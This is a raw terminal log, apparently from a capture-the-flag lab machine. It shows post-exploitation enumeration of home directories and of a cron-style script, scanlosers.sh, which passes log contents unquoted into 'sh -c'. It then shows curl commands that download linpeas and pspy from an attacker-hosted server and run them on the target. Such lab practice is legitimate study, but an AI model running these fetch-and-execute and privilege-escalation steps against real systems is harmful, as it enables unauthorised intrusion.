pwd
/home
ls
kid
pwn
cd pwn
ls
recon
scanlosers.sh



ls -la
total 44
drwxr-xr-x 6 pwn  pwn  4096 Feb  3 12:06 .
drwxr-xr-x 4 root root 4096 Feb  3 07:40 ..
lrwxrwxrwx 1 root root    9 Feb  3 12:06 .bash_history -> /dev/null
-rw-r--r-- 1 pwn  pwn   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pwn  pwn  3771 Feb 25  2020 .bashrc
drwx------ 2 pwn  pwn  4096 Jan 28 17:08 .cache
drwxrwxr-x 3 pwn  pwn  4096 Jan 28 17:24 .local
-rw-r--r-- 1 pwn  pwn   807 Feb 25  2020 .profile
-rw-rw-r-- 1 pwn  pwn    74 Jan 28 16:22 .selected_editor
drwx------ 2 pwn  pwn  4096 Jan 28 16:32 .ssh
drwxrw---- 2 pwn  pwn  4096 Feb  7 06:10 recon
-rwxrwxr-- 1 pwn  pwn   250 Jan 28 17:57 scanlosers.sh



./scanlosers.sh
/bin/sh: 16: ./scanlosers.sh: Permission denied



cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi


pwd
/home/kid/logs
ls -la
total 8
drwxrwxrwx  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb  7 09:41 ..
-rw-rw-r--  1 kid pwn    0 Feb  7 05:54 hackers










=================



pwd
/home/kid
curl -o linpeas http://10.10.14.12/linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  312k  100  312k    0     0   202k      0  0:00:01  0:00:01 --:--:--  202k
ls
html
linpeas
logs
snap
user.txt

./linpeas
/bin/sh: 70: ./linpeas: Permission denied


chmod +x linpeas
./linpeas








curl -o pspy http://10.10.14.12/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3006k  100 3006k    0     0  1000k      0  0:00:03  0:00:03 --:--:-- 1000k






hippoeug@kali:~/Documents$ sudo python -m SimpleHTTPServer 80



./pspy
sh: 27: ./pspy: Permission denied
chmod +x pspy
./pspy
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855












